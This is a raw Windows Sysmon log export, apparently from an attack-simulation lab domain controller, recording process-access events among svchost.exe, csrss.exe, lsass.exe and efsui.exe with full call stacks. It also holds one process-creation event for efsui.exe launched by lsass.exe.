13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E44-6005-0B00-00000000A301}856888C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\efsext.dll+2d2c|C:\Windows\system32\EFSCORE.dll+18451|C:\Windows\system32\EFSCORE.dll+17c2a|C:\Windows\system32\EFSCORE.dll+17805|C:\Windows\system32\EFSCORE.dll+18bd|C:\Windows\system32\efssvc.dll+1337|C:\Windows\System32\sechost.dll+b71a|C:\Windows\System32\sechost.dll+a574|C:\Windows\system32\lsasrv.dll+5212e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 10341000x800000000000000010030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23e0b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
